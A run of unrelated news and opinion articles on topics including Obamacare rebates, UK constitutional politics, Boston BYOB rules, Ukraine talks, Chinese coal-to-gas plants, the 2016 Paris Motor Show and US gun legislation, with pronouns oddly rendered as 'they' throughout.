Here's a chance for all who think Obamacare is a socialist Big Government scheme to put their money where their ideology is: If you truly hate the Affordable Care Act, you must send back any of those rebate checks you receive from your insurance companies thanks to the new law.
This is just common sense. If you think free enterprise should be liberated from Washington's interference, what right does Uncle Sam have to tell the insurers they owe you a better deal? Keeping those refunds will make you complicit with Leviathan.
And here's a challenge to Mitt Romney: You are running a deceitful ad about waivers the Obama administration has yet to issue based on rules allowing governors to operate their welfare-to-work programs more effectively. Will you please stop talking about your devotion to states' rights?
Up until now, you were the guy who said that wisdom on matters related to social programming (including health insurance) lies with state governments. Five governors, including two of your fellow Republicans, thought they had a better way to make welfare reform work. The Department of Health and Human Services responded by proposing to give states more latitude. Isn't that what honoring the good judgment of state governments is all about?
Oh, yes, and if Romney thinks President Obama is gutting welfare reform, I anxiously await their criticism of Brian Sandoval of Nevada and Gary R. Herbert of Utah, GOP governors who requested waivers. If Romney means what they say, doesn't they have to condemn those who asked Obama to do what Obama did?
Political commentary these days is obsessed with the triviality of this campaign. Most of it is rooted in the refusal of conservatives to be candid about the implications of how their beliefs and commitments would affect the choices they would have government make — and how they differ from the president's.
In Romney's case, this often requires them to invent an Obama who exists only in the imagination of their ad makers. So they take Obama's statements, clip out relevant sentences and run ads attacking some strung-together words that have a limited connection to what the president said. In the welfare ad, Romney lies outright.
But this is part of a larger pattern on the right, illustrated most tellingly by conservative rhetoric around the Affordable Care Act. In going after Obamacare, conservatives almost never talk about the specific provisions of the law. They try to drown it in anti-government rhetoric. “Help us defeat Obamacare,” Romney said after the Supreme Court declared the law constitutional. “Help us defeat the liberal agenda that makes government too big, too intrusive, and is killing jobs across this great country.”
Well, the new law does intrude directly in the insurance market. It requires that at least 85 percent of large-group premiums and 80 percent of small-group and individual premiums be spent directly on clinical services and improving the quality of health care. Imagine the radicalism: The government is telling insurance companies that they must spend most of the money they take in on actual health care for the people and businesses paying the premiums.
If the insurers spend below those levels, they have to refund the difference. According to Health and Human Services, 12.8 million Americans will get $1.1 billion in rebates. That comes to an average rebate of $151 per household. In 12 states, the rebates will average $300 or more.
Here's your chance, conservatives. Big, bad government is forcing those nice insurance companies to give people a break. From what you say, you see this as socialism, a case of the heavy hand of Washington meddling with the right of contract. You cannot possibly keep this money. So stand up for those oppressed insurers and give them their rebates back!
As for the waivers on welfare, Romney's position is dispiriting. Here's a former governor whose Massachusetts health-care plan — the one that resembles Obamacare — was made possible by federal waivers; who, like other governors, wanted flexibility to do welfare reform their way; and who has said they would roll back Obamacare through the waiver process they now assail. He's turning away from what they claim to believe about state-level innovation for the sake of a cheap and misleading campaign point.
I'd also be curious to know whether Romney got a rebate on their health insurance premiums courtesy of Obamacare and whether they plan to return it. But given their attitude toward disclosure, we'll probably never find out.
ejdionne@washpost.com
December 12, 2011: We've scoured the Web to find the best and most compelling animal stories, videos and photos. And it's all right here.
iStock Photo An Italian woman left millions to a black cat that they found on the street, like this one.
Once a Stray, Cat Inherits $13 Million Estate
A cat in Italy has quite a rags-to-riches tale. Tommaso, a 4-year-old black cat who lived on the streets of Rome as a kitten, got lucky when they were taken in by Maria Assunta. Assunta, a 94-year-old widow with no children, died two weeks ago and left their entire estate — worth about $13 million U.S. — to Tommaso, through a nurse who had cared for Assunta in the last few months of their life. The kitty's posh inheritance includes cash and property in Rome and Milan, as well as land in Calabria, Italy. — Read it at the Telegraph
Dog Rescued After Jumping Into the Hudson River to Fetch Frisbee
Bodhi, an Airedale Terrier, may have been a little too determined to catch their owner's Frisbee. The 2-year-old dog jumped off a Manhattan pier where they were playing with their owner into the frigid waters of the Hudson River to retrieve the disc. Fortunately, a call to 911 brought an New York Police Department harbor boat to the scene, and the officers on board were able to pull the dog out of the river to safety. — Read it at the New York Daily News
Panda Checks Out Gift of Snow and Christmas Tree in San Diego
The San Diego Zoo created a Christmas scene for a 2-year-old panda named Yun Zi, complete with artificial snow and a five-foot Christmas tree made out of bamboo, their favorite food. Yun Zi happily walked across the exhibit to enjoy the fluffy white stuff underneath them in order to dig into the tree. — See photos at People Pets
ABC Action News / YouTube Eli is driven in their owner's truck after the incident.
Hunter Reportedly Shot by Dog in Florida
Authorities believe a 78-year-old Florida man's dog accidentally shot them with a rifle when they were headed out to hunt. Investigators said the firearm was lying in the back seat of a truck as the pair traveled down a bumpy road. Eli the dog got excited, and investigators think they may have stepped on the gun and released the safety. Just last week, another hunting dog accidentally sprayed their owner in the buttocks with birdshot. — Watch it at ABC Action News
Elderly Woman Faces Charges for Feeding Birds
Officials in a Massachusetts town say they've warned Claire Butcher, 80, to stop feeding the birds at a local pond. They say the health department in Lynn is worried about community health problems due to the increase of bird feces in the park. But even after the police pressed charges, Butcher wouldn't stay away. "Well, look at it this way," Butcher told ABC News. "I will be the first 80-year-old woman in the worldwho was thrown in jail for feeding the animals." — Read it at ABC News
Kitten Rescued After Being Stuck in Drain Pipe
In Mira Loma, Calif., a 2-month-old kitten was discovered wedged inside a drain pipe by a good Samaritan. The man brought the kitty and pipe to a shelter, where veterinary technicians tried in vain to get the cat out by lubricating him. Finally, the fire department was called in and had to use the Jaws of Life to safely extricate the kitten. — Read it at Today
London mayoral candidate Paul Cheng has refused a last-minute developer donation, citing what they consider the poor optics of accepting it, their just-released donor list shows.
Cheng turned down a contribution from Drewco Development Corp. to their largely self-financed campaign, but has accepted about three dozens donations – mostly from low-profile Londoners – to help bankroll their bid.
The decision to reject the developer cash, made this week, was simple, Cheng told The Free Press Saturday.
“I don't want to be seen – I have a choice,” they said, shifting thoughts mid-sentence. “Whether you're in the pocket or you owe anything to a certain group.
“We're beholden to nobody.”
While polls suggest Cheng faces a tall order to beat front-running Matt Brown for the job in Monday's election, the political neophyte who went from total unknown to true contender in mere months is still campaigning hard.
They published their donor list Saturday, one day after Brown revealed they have the support of nearly 1,000 different donors – no doubt a record for a local municipal campaign.
Joe Swan also published their supporters' names. There are about 30 donors backing what they described as a “modest” campaign.
Few names stand out among Cheng backers. Andrew Spriet and the London District Heavy Construction Association are on the list, as are small local businesses like Danny's Wine & Beer.
A poor servant's son who came to Canada from Hong Kong at age 13 in 1969, Cheng made their money as an oil-and-gas consultant. They work largely outside Canada.
They say they left their work overseas to launch a mayoral bid earlier this year, when few were taking them seriously. But he's spent big money – their own – on advertising and tapped into a widespread desire for fresh blood at city hall.
That has them consistently polling second behind Brown and well ahead of veterans Swan and Roger Caranci, who last week stopped campaigning and urged Londoners to back Cheng.
The campaign has been a remarkable success, whatever happens Monday. But Cheng, 58, remains confident they can win.
As for the self-financed campaign, they said: “If this is not commitment I don't know what is. I've got no more blood to give, man.”
Paul Cheng donor list by The London Free Press
Matt Brown donor list by The London Free Press
Donor List Swan for Mayor Oct 15-14 by The London Free Press
The cabinet secretary, Gus O'Donnell, has just issued a 150-page draft cabinet manual that sets out how we are governed, and is being widely hailed as the foundation for a codified constitution. Although an unelected mandarin, they took it upon themselves to give an interview in advance to the Telegraph and told them: "I think those who are in favour of a written constitution will start with it … It has never existed before; we've been waiting decades and decades for this."
Really? Let's put that little "we" on hold for a moment.
The document is not in any way a draft of a democratic constitution. It is a manual for British dictatorship. It is quite open about this. It states: "It is written from the perspective of the executive branch of government". It adds: "It is not intended to have any legal effect or set issues in stone. It is intended to guide, not to direct." In plain language, we can change it whenever we think it is best and it sets out how the executive can get away with whatever it can get away with.
The manual opens with what in any constitutional democracy would be a lie and in our second-rate version is arguably false as well as an outrage. This is how it sees Britain:
"The UK is a parliamentary democracy which has a constitutional sovereign as Head of State; a sovereign parliament, which is supreme to all other government institutions, consisting of the Sovereign, the House of Commons and the House of Lords, an Executive drawn from and accountable to Parliament, and an independent judiciary."
There is no mention of the rule of law. The judges are independent but parliament is supreme, meaning above the law, meaning it has the powers of, sorry to have to repeat the word, dictatorship. Once they could have got away with this formulation easily. Now it is harder, as someone slipped up and drafted the Constitutional Reform Act of 2005 which was passed by a sleepy parliament. Part 1 asserts that nothing in it overturns "The existing constitutional principle of the rule of law".
A constitutional principle – no less. But thanks to O'Donnell's old-fashioned legerdemain, like all good principles it has disappeared.
As for the actual section on ministers and the law, it states, "Ministers must act lawfully in taking decisions". Doesn't that make you feel proud? Have you ever seen a job description that felt it necessary to stipulate that you had to "act lawfully"? What then follows is a high-class villain's charter, a guide for the executive as to how, as they say, to stay on the right side of the law (where they have failed to change it).
I could go on: it sets out in clauses 122 and 123 how "The Prime Minister is responsible for the overall organisation of the Government … and departments do not have their own legal personality". This means that departments of state can be split, merged, reorganised, renamed, without any say by parliament (which is how, under Lord Mandelson, universities were snicked out of education and into business).
The section on ministers and parliament similarly is a guide for how to manage parliament. Clause 205 is a classic: "Ministers should consider publishing bills in draft for pre-legislative scrutiny, where it is appropriate to do so", like whenever.
There is nothing on ministers and the public. There is no sense whatsoever that "the executive branch" which includes the elected government has any duty or obligations towards the people.
So what's going on? Why has this outrage been published to the lone handclaps from the few remnants and detritus of the great and good still standing, like Peter Hennessy and Robert Hazell?
When O'Donnell's most outstanding predecessor Robin Butler was head of the civil service they were asked what the British constitution was and they answered, "It is something we make up as we go along". There is that mandarin 'we". It isn't you, and I or even readers of the Daily Mail, for whom I have the greatest respect, who "make it up". No, it is them. It belongs to them and they made it up. But to get away with it meant not shining light on the fact.
Then along came John Smith, who as leader of the Labour party committed it to a "new constitutional settlement". Smith died, Blair succeeded them and under them dramatic changes, parliaments, the Human Rights Act, freedom of information, were rammed through and the old constitution was broken. Along comes Gordon Brown, who had advised Smith, and declares we need to renew trust. Privately, they wanted to be "father of Britain" with a written constitution as their crowning achievement. But the original idea for this, that went back to Charter 88, was to create a democratic settlement, to turn subjects into citizens, to vest sovereignty in "we the people" with an open process akin to South Africa's (and polls always show around 70% support for a democratic constitution – although wisely few look to the powers that be to permit one).
But any attempt to trust the people, as opposed to bankers, and launch an open process withered away. In their last, gasping days of office, Brown instructed Gus O'Donnell to write down what we had, hoping the lure of a written (non) constitution would win the vote of an eccentric or two. Here is the result, the last steaming dump of Labour's lost opportunity.
Amusingly, Democratic Audit had already set out the status quo in writing when it published "The Unspoken Constitution". The idea was to expose how Britain is actually run thereby shaming people into change. It's open words were "We, the elite". It was meant as a joke. Ha bloody ha. We, that is to say we would-be citizens of this country, have not, repeat not, been "waiting decades" for this.
Thirsty diners at KO Pies in South Boston have been denied the authentic Australian experience of washing down a meat pie with a frothy Coopers Original Pale Ale because the 16-seat restaurant cannot afford a beer and wine license.
That may soon change after the City Council voted unanimously Wednesday to end Boston's ban on BYOB — “bringing your own bottle” of wine or beer to select neighborhood restaurants. The ordinance, which Mayor Martin J. Walsh said they will sign, is aimed at entrepreneurial chefs like Sam Jackson at KO Pies, who frequently packs meat pie to go and directs customers to local liquor stores that stock Australian beer.
“We get people craving a beer with their pie,” Jackson said. “Now, potentially, they will be able to do that at KO, which is great, mate.”
Advertisement
But don't crack open that Coopers just yet. It may take a year before diners can bring their own beer or wine.
Get Metro Headlines in your inbox: The 10 top local news stories from metro Boston and around New England delivered daily. Sign Up Thank you for signing up! Sign up for more newsletters here
And leave that 1998 bottle of Domaine de la Romanée-Conti Montrachet at home if you go to L'Espalier in the Back Bay. BYOB will be allowed only at establishments without liquor licenses, which means that 1998 vintage must be bought off the L'Espalier menu for $8,750.
BYOB now goes to the mayoral-controlled Boston Licensing Board, which will craft regulations. The city will launch “a thorough and robust community process” with the goal of implementing BYOB by the end of 2016, according to Walsh's press secretary, Bonnie McGilpin.
Councilor Michelle Wu spearheaded the push for BYOB, which has flourished in Philadelphia and Chicago.
“The goal in bringing it here to Boston is to spark small neighborhood restaurants by giving entrepreneurs an additional tool to grow their businesses and creating more options for residents,” Wu said.
Advertisement
The council proposed BYOB rules, but the regulatory framework will ultimately be created by the Licensing Board. Wu described a “safe and regulated” BYOB system for restaurants with 30 or fewer seats in outlying neighborhoods, such as Dorchester, Hyde Park, Roxbury, and South Boston.
The council recommended banning BYOB downtown and in the North End, South End, Bay Village, Fenway, Chinatown, Seaport, West End, Beacon Hill, and Back Bay neighborhoods.
Diners should be limited to a bottle of wine or six-pack per couple, Wu said, and restaurants should be able to collect a “corkage fee,” which is a charge for bringing in wine or beer. Wait staff should also undergo training on safely serving alcohol, and restaurants should be required to have liquor liability insurance as part of the measure adopted Wednesday.
“This is not for the pizza place with one person behind the counter and no one supervising diners on the floor,” Wu said. “This is not for locations where the neighborhood is fiercely opposed. There is still going to be a community process for each BYOB applicant.”
Boston is able to embrace BYOB restaurants without approval from the Legislature, a rare quirk in a state where even inconsequential city initiatives need the blessing of Beacon Hill.
Advertisement
Earlier this month at a public hearing on BYOB, there was no angry contingent of restaurant owners worried the initiative would devalue their beer-and-wine licenses, which can cost $50,000 to $75,000. Proponents say it could enliven local business districts by making it easier for budding restaurateurs.
In their home neighborhood of Hyde Park, Councilor Stephen J. Murphy has described a commercial district anchored by seven nail salons, five hair salons, and three storefront churches.
“This in my view is to diversify neighborhood business districts in the outlying sections of the city,” said Murphy, who co-sponsored the measure.
Councilor Ayanna Pressley earlier expressed skepticism, fearing BYOB would create a two-tiered system with most liquor licenses remaining downtown while outlying neighborhoods would be relegated to BYOB. But Wednesday, Pressley voted in favor of the measure after vowing to push for more reforms to the city's liquor license system.
“BYOB should be an option for aspiring restaurateurs and the residents of Boston,” Pressley said. “But I do not want this to become the only option.”
In Roslindale, chef Christopher Lin recently made the investment in a beer and wine license for their Seven-Star Street Bistro, which they described as a Taiwanese Gastro pub. They own and operates the restaurant with their wife and 80-year-old father, who cooks on weekends.
Seven Star launched four years ago and recently expanded to include a dining room. BYOB would have been a good alternative, Lin said, as the restaurant gained its footing. Now that they have a beer and wine license, Lin said they were not worried BYOB will damage their investment.
“For greater good, it will definitely help small business take away some of the burden,” Lin said. “There are already so many barriers. This might allow for some more creative businesses to come out of the woodwork.”
Andrew Ryan can be reached at andrew.ryan@globe.com
AMs should consider sitting a couple of times a year in north Wales, a Labour MP has said.
Albert Owen spoke after the 20th anniversary of the devolution referendum in 1997 which established the assembly.
The MP for Ynys Mon said there was a "long way to go" to convince people in the north that the legislature is for the whole of the country.
The assembly returns from its summer recess on Tuesday.
In the early days of devolution AMs sat in regional committees, but Mr Owen said members had not been interested.
People have "come to terms" with devolution, they told BBC Wales. "Although they will complain about it being south Wales-based, they still feel that it is good for Wales that we have our own voice."
But they added: "I still think that there's a long way to go in convincing people in north Wales that the assembly is for the whole of Wales. That will take time."
They said: "If I was a north west Wales AM I would be saying that the assembly should sit in the north in Llandudno or in a council chamber, a couple of times a year, to show that it cared, to talk about north Wales issues.
"I think with devolution, it is about bringing politics closer to the people. Cardiff is as far away from Anglesey as London is."
Mr Owen said there was a "greater sense now of transport in the north getting back on the agenda", but added: "It's more than just roads. Europe could supply money for roads, the UK government could supply roads and infrastructure and jobs.
"Really, when we talk about politics being part of the area, and the area being part of national politics, then I think you need to get politics closer to them."
'Cardiff-centric'
Mr Owen said devolution had "probably not" delivered enough for Anglesey.
"But the expectations are too high. If you look at Parliament it took hundreds of years to develop, where we are only talking 20 years. In the scale of history that's nothing," they said.
The MP was critical of AMs from north west Wales, saying "they became very Cardiff-centric very quickly".
"They sort of looked more to nation building than representing the north west and the periphery areas of Wales.
"That has not helped close this gap in people feeling remote from Cardiff."
Plaid Cymru Ynys Mon AM Rhun ap Iorwerth said: "Successive Labour governments have failed to deliver for the whole of Wales.
"Championing Anglesey and calling on the Labour Welsh Government to spread prosperity, investment and opportunity throughout Wales is at the heart of everything I do as Ynys Mon's AM."
Tory AM Mark Isherwood said: "I was opposed to the scrapping of regional committees and have regularly chaired cross-party meetings to fill the void they left.
"But what North Wales really needs is a seat at the cabinet table and a North Wales minister could ensure that this part of Wales is firmly in the government's thinking."
Ukraine crisis: Angela Merkel and Francois Hollande meet with Vladimir Putin in bid to end fighting in east Ukraine
Updated
The leaders of Germany, France and Russia have held what the Kremlin calls "constructive and substantive" talks to help end the conflict in eastern Ukraine.
Kremlin spokesperson Dmitry Peskov said German chancellor Angela Merkel, French president Francois Hollande and Russian leader Vladimir Putin met for five hours in Moscow.
"The talks are over for now and our guests are already on their way to the airport," they told reporters at the Kremlin.
Despite appearing upbeat about the discussions, the talks ended without any announcement on a possible agreement to end the fighting in eastern Ukraine.
The Kremlin said the leaders would continue working towards a joint document on implementing a ceasefire agreement that was reached in Minsk last September, but has since collapsed.
The leaders are likely to speak over the phone later this weekend, Mr Peskov said, indicating that Ukrainian president Petro Poroshenko would also take part in the conversation.
More than 5,000 people have been killed in fighting between pro-Russian separatists and Ukrainian government forces in eastern Ukraine.
In a sign of the tense atmosphere, the leaders went straight into the Kremlin for talks, without the usual diplomatic niceties of a welcoming handshake for the cameras.
Before arriving in Russia, Mr Hollande called the talks "the first step", while Ms Merkel said it was unclear whether the meeting in Moscow would secure a ceasefire.
Them spokesperson said there "was no sign whatsoever" of a breakthrough so far.
An official from a major EU country, who declined to be identified, gave a gloomy prognosis and said Mr Putin would have little reason to urge the rebels to back down while they were advancing.
"He does not appear to have any incentive to back down now. The separatists are in control and taking more territory. They can sit back and wait as the pressure steadily builds on Ukraine and its leaders," the official said.
Meanwhile, on the ground in eastern Ukraine, a brief truce was organised so trapped civilians could reach safety from Debaltseve, a government-held railway hub nearly encircled by rebel forces who made it the target of their advance.
Both sides sent convoys of buses, giving residents a choice to evacuate to government or rebel territory. The government buses left full, but the rebel buses left mostly empty.
Peace talks last-ditch effort for ceasefire
The Franco-German peace effort is an attempt to restore a ceasefire to the conflict, before European leaders meet next week to discuss imposing new economic sanctions against Russia.
Previous sanctions, coupled with a decline in oil prices, contributed to a sharp fall in the ruble but seem to have done little to deter Mr Putin from their support for the rebels in territory they have dubbed "New Russia".
This week, Washington began openly hinting it could arm Ukraine's military. But its European allies have increasingly spoken out against such a move, arguing it would only escalate the conflict, while falling short of giving Ukraine the means to resist an onslaught backed by Moscow.
US General Philip Breedlove, NATO's top military commander, implied that they favoured sending weapons, telling a security conference in Munich that the West should use "all the tools in the tool bag".
But German defence minister Ursula von der Leyen told the same conference: "Are we sure that we would be improving the situation for the people in Ukraine by delivering weapons? Are we really sure that Ukraine can win against the Russian military machine?"
Western countries accused Mr Putin of sending funds, heavy weapons and troops to back pro-Russian separatists who launched an offensive in January, when a five-month-old truce finally collapsed. Moscow denies assisting the rebels.
Since launching their offensive, the rebels have made major advances.
Reuters
Topics: unrest-conflict-and-war, world-politics, russian-federation, ukraine, germany, france
First posted
Think China's coal-fired power plants are dirty? You haven't seen anything yet.
The country plans to build up to 40 massive projects to convert coal to synthetic natural gas (SNG), a process that would dramatically increase China's greenhouse emissions, and emit huge volumes of toxins while consuming vast quantities of water, according to a study released today by Duke University.
Given China's recent pledge to cut coal consumption, what gives? In short, China has become a voracious consumer of natural gas—the largest in the Asia Pacific region—and is seeking to lessen its dependence on overseas suppliers of liquefied natural gas (LNG). And while the Chinese government wants to clean up urban air pollution that shrouds cities like Beijing in toxic smog, it doesn't really care about greenhouse gas emissions. Most of the approved SNG projects will be built far from Chinese metropolises.
So far the government has approved nine SNG projects to produce 37.1 billion cubic meters (1.31 trillion cubic feet) of synthetic natural gas a year. According to Duke University researchers Robert Jackson and Chi­Jen Yang, SNG emits seven times the greenhouse gases of natural gas. If it is burned to generate electricity, the carbon spew is up to 82% greater than a coal-fired power plant. Tailpipe emissions from a SNG-powered vehicle are twice those of a conventional car.
Bottom line: Over the 40-year life of China's nine approved SNG plants, their carbon-dioxide (CO2) emissions would hit 21 billion tonnes, compared to three billion tonnes from a “natural” natural gas plant. If China builds the 40 planned SNG plants, their emissions would skyrocket to 110 billion tonnes of greenhouse gases over 40 years. China's total CO2 emissions in 2011 were 7.7 billion tonnes (pdf).
It gets worse. Most of the nine approved plants would be built in desert regions and consume more than 200 million tonnes of water a year. To produce a cubic meter of SNG requires 6 to 12 liters (1.6 to 3.2 gallons) of water compared to 0.1 liters to 0.2 liter of water for a cubic meter of natural gas. “The water consumption for SNG production could worsen water shortages in areas already under significant water stress,” states the report, published in the journal Nature Climate Change.
Despite the Chinese leadership's new power policies, coal still remains king, Jackson told Quartz. “China has abundant coal resources, and local and provincial interests push the system to use the coal,” they said in an email. “In my view, developing shale gas in China would be much smarter than making natural gas from coal, but unconventional energy extraction in China is still developing.”
The Duke scientists suggest Chinese officials study the US's failed experiment with SNG. In the 1980s, the US Department of Energy provided a $2 billion loan guarantee to build the Great Plains Synfuels Plant. The plant went online in 1983 and within two years its operator filed for bankruptcy. The US Department of Energy bought the project for $1 billion and subsequently sold it for $85 million.
“Using coal to make natural gas may be good for China's energy security,” Jackson, a professor of environmental sciences, said in a statement, “but it's an environmental disaster in the making.”
One of this year's biggest motoring events definitely is the 2016 Paris Motor Show. We are here to introduce you to what you can expect from this year's showing.
There haven't been much happening or car presentations during the summer, so all of the big revelations are projected to occur at the Paris Motor Show. Some of the world's largest vehicle manufacturers have already announced that they are going to introduce their new cars in Paris.
Mondial de L'Automobiles as it is called in French is an auto show that is held every second year, with one year being reserved for Paris and the other for Frankfurt. Its main rival, to call it that way, is the Geneva Motor Show. It is a matter of prestige which Auto Show will present better cars to the world. Paris Motor Show held in 2014 was the most visited auto show in the world with approximately 1.25 million visitors.
It is also considered to be a home turf for French Manufacturers Peugeot, Citroen, Renault and not so mainstream Aixam and Ligier. Together with French companies, this year Paris Motor Show will be a home for most of the world's largest car manufacturers which will be presenting almost everything in their range. From the smallest mini-cars to the biggest SUV-s, and hypercars and concepts in the middle.
Now, let's take a look at what will we be presented at the Paris Motor Show.
Abarth doesn't have any new vehicle scheduled for presentation in Paris but instead it will once age show their ongoing Abarth 124 and new 595. These cars are sportier and more powerful versions of standard Fiat's 124 and 595.
Audi's main showing-off will definitely be the new Audi Q5. The car will be on the market in 2017, and in Paris will be introduced to the world for the first time. Most of the design cues and technology used will be copied from Q7, but it will be the first car from Audi's SUV line that will come with a major update.
Other presentations include A5 and S5 Sportback. With A5 coupe being presented a few months ago, these two are expected to feature in Paris. A5 Sportback will have more aggressive design compared to the regular model, while the interior will be same as in the A4. Other models that will be on the show are TT RS and Audi R8 Spyder.
Biggest fish from the BMW sea will be the BMW X2. This model will fit in between X1 and X3 as it can be concluded from its name. We had the chance to see it camouflaged and in the photos that BMW gave us. The car presented will be the closest to serial production model so far. It's worth mentioning that we won't see the final version until next year.
French company on the French auto show! Citroen is expected to present a couple of new models, and concepts. The biggest presentation will definitely be new C3 inspired by C4 Cactus, fully redesigned, filled with new technology and sitting on a completely new platform.
Another Citroen product is coming to the world scene in Paris. The car in question is CXPERIENCE which is a large sedan that will also be a plug-in hybrid, and it's meant to give us a clue of the future Citroen's to come. French manufacturer stated that this car is not previewed for their established models, C5 and C6 respectably.
Dacia will show its already existing models Sandero, Stepway and Logan MCV that all went through small facelifts. The biggest change on these models could be the introduction of new 1.2-liter petrol engine, together with already announced new grill and headlights.
Ferrari will debut with 2017 edition of LaFerrari Spider. This car will be limited edition, with only 150 units being made. It is expected that this model will attract much attention if it debuted at the Paris Motor Show. It will be offered only to selected Ferrari customers, so we who are mere mortals, will just have to settle with feasting our eyes on it.
Honda will greet Paris with its new Civic model. It will be bigger, with sportier design, more technology that will improve the driving experience and completely new breathtaking design. New engines in the form of 1.0 and 1.5-liter VTEC petrol units will find its way on to the new Civic.
A sporty version of Civic, the Type R will also debut at the Paris auto show. This model will be even more aggressive than before, with front end getting, even more, closer to the ground. It is rumored that it will feature more than 340bhp and that it will go 0-60 in five seconds or even less.
Hyundai will greet Paris with its new i30 which was presented earlier in September. Hyundai is keeping its hopes high that i30 will be able to fight off the competition in the shape of Renault Megane and Vauxhall Astra. They think that in terms of quality, design, included technology and handling of the car they did just enough to find themselves a place on the market. The i10 supermini was also facelifted, and it will be on Hyundai's stand in Paris.
Projected as Fiesta's rival, new Kia Rio was thoroughly redesigned and will have its incarnation at the Paris Auto Show. Its size was increased both in terms of length and width and with a lower stance, it has completely new, more aggressive look. Changes were made to the interior. Bigger, broader and cleaner dash with large touchscreen makes the interior look modern and classy. Thankfully to the new platform, Kia Rio also has more room.
New Discovery is what is coming to us in Paris. We already have some clues on what will the car look like and the technology that is going to use (Bear Grylls showed us how the back seats could be moved from the air while skydiving). Design wise the car will look more like Discovery Sport rather than regular Discovery. It will also be bigger but lighter. The official launch is scheduled for September 28, while the sales will start early next year. Starting price will be in the region of £45,000.
Lexus
Lexus will be presenting another concept vehicle in Paris. Just like every time when the Lexus is in question, this is no ordinary concept. The UX Concept will be one of their best offerings so far. Lexus is keeping its mouth shut concerning this vehicle, but in spite of that, we managed to find out a couple of things. Size wise it will be similar to Audi's Q2, while the interior will be a combination of modern technology and traditional Japanese craftsmanship.
Another thing that Lexus is going to present, and it's not a car, is Kinetic Seat concept. This idea shows what Lexus thinks is the future of car seating.
AMG GT Roadster and AMG GT C Roadster had already been revealed before their official Paris Auto Show debut. AMG GT C will feature an engine that can produce 549bhp and 680Nm, sprinting from 0 to 60 mph in astonishing 3.7 seconds. Both of these cars are being influenced, in terms of design, by AMG GT-R.
Mercedes-AMG GLC 43 Coupe will also make its debut. It is equipped, same as the other AMG vehicles, with 3.6-litre V6 twin-turbo that has 362bhp and can go 0-60 in 4.9 seconds. Things that will differ it from the other cars in its range are unique alloy wheels, different body kit, carbon details and red details on the interior.
Like some of the other manufacturers, MINI is not saying much about just which car will be showed in Paris. There are many things that point out that it definitely won't be the new Countryman. This model will have to wait until Los Angeles Auto Show. Instead, Paris could be greeted with a more sizzling version of MINI Clubman JCW, but this remains to be seen.
The Japanese manufacturer will come to Paris to show off their new concept. GT-PHEV is new mid-size hybrid SUV from Mitsubishi. Grand Tourer PHEV Concept should slot right in between ASX and the Outlander. Regarding design, it's much more similar to Land Rover's Evoque with whom they could compete in not so distant future. This is all still far away because Mitsubishi didn't disclose any info regarding production and release date.
Nissan is obviously planning to dominate the mini-car market. With new upgrades, the Nissan Micra could just do that. Based on the Sway concept, new Micra will have a completely new design, more aggressive and modern lines that will give the car new look. Not to mention a variety of new engines, and a number of technological innovations and improvements.
Although revealed earlier this year, Peugeot 3008 will make its official debut at the Paris Auto Sow together with its GT version. Ready to rival the likes of Kia Sportage and Nissan Qashqai, 3008 is one of the most anticipated crossovers that will debut in Paris. With its stylish design, new technology (i-Cockpit) and a completely new range of engines Peugeot 3008 is ready to leave an impression.
Another SUV from Peugeot is getting a facelift and a presentation in Paris. The 5008 has been reshaped from bottom to top and with the addition of new engines and I-Cockpit is more than ready to rival Renault Grand Scenic.
Porsche has officially launched new Panamera, so much that the Turbo and 4S diesel models have already been driven, but nevertheless this model will find its way to the Paris. Reason will probably be that this car deserves a full public presentation. New Panamera is a bit longer than the previous version, with more 911 lines included. It also features more space which will be even more expressed when Sport Tourismo comes out. The Panamera model that will be for the first time presented to the world at this prestigious show is the 4 E-Hybrid.
The last manufacturer from the French Big Three, Renault, will be presenting its pickup model – The Alaskan. Based on the Nissan Navara the car will feature 187 bhp diesel engines previously used in the Renault minivan segment. Alaskan should be available for purchase during this year for an estimated price of £22,000. Other models that will Renault present are facelifted Clio and Koleos SUV.
Like some of the other models from our list, Skoda Kodiaq is the car we have already seen, but it will still be presented publicly at the Paris Motor Show. Kodiaq is 5-seat and/or 7-seater SUV that will be on sale in early 2017. It will most likely compete with Land Rover Discovery Sport and Kia Sorrento.
Smart will treat as with two of its models. Smart ForTwo and ForFour Electric Drive respectably. Both of the cars will hit the market In early 2017, and the first one will even be available in a convertible version. This will be their official introduction, and in addition to them, ForTwo Brabus will also be presented. Brabus version will be available for purchase shortly after the Paris Auto Show.
Ssang Yong will present its LIV-2 Concept which is pre-production version of Rexton. This car is targeting Hyundai Santa Fe and similar SUV's. Rexton will be released for sales during 2017.
SX4 S-Cross is Suzuki's crossover that is booked for Paris presentation. Not much is known about this car because only one photo was made available for inspection. What is known is that the car will get two Boosterjet petrol engines and a 1.6-liter diesel one.
In addition to SX4 S-Cross Suzuki will also bring its supermini segment car, the Ignis. It was modeled after the SC100 Whizzkid coupe, and considering its size and little higher stance it will most likely compete with Fiat panda 4×4.
It is not confirmed at this point, but Vauxhall will most likely debut with its Insignia model. This car which rivals the likes of Ford Mondeo will get a more coupe-like design and a range of new petrol and diesel units under the hood. Technology wise it will certainly feature most of what we have seen on the new Astra.
Another car that will find itself on the Vauxhall stand is the Opel Ampera. Based on the Chevrolet Bolt, this model won't be branded as Vauxhall but as an Opel instead. Despite this, it will exclusively be sold only in the UK.
The first glimpse that most of the people had at new VW Electric Vehicle was some time ago at the Volkswagen tech day. This model will be the main story on the VW stand. They announced that the car will have 248 miles of range and that this range will be increased up to 370 miles on larger models that will be delivered by the year 2019.
Many Americans expected a real change in the nation's gun laws after the killing of 20 first-graders in Newtown. But three months later, the outcome looks unclear. No fewer than four pieces of legislation have passed a Senate panel over the past two weeks to move to the Senate floor. “It's a step forward,” Debra DeShong Reed, spokesperson for the Brady Campaign to Prevent Gun Violence, told msnbc.
At the same time, legislators in both the House and Senate have stuck provisions into spending bills that could undermine federal enforcement of both existing and proposed gun control efforts. “It's gonna be a slog,” Ladd Everitt, spokesperson for the Coalition to Stop Gun Violence, told msnbc.
“The will is there,” Josh Sugarmann, executive director of the Violence Policy Center, told msnbc. Sugarmann is a longtime gun control advocate who grew up in Newtown decades before this past December's tragedy. “But the NRA is relentless,” they added. “They are out there in public. They are working behind the scenes, and that is what we are seeing right now.”
On Thursday the Senate Judiciary Committee passed the Assault Weapons Ban in a 10-to-8 vote along party lines. But even the bill's supporters concede that it has little chance of ever passing even just the Senate.
“The road is uphill,” Sen. Dianne Feinstein, who proposed the legislation, told reporters after the committee vote. “I fully understand that.”
The bill would ban all new sales of semi-automatic rifles and pistols that can both accept a detachable magazine and have one other military-style feature like a pistol grip, along with semi-automatic shotguns that either have similar features, or that can hold more than five rounds. The legislation would also limit all high-capacity magazines to no more than 10 rounds.
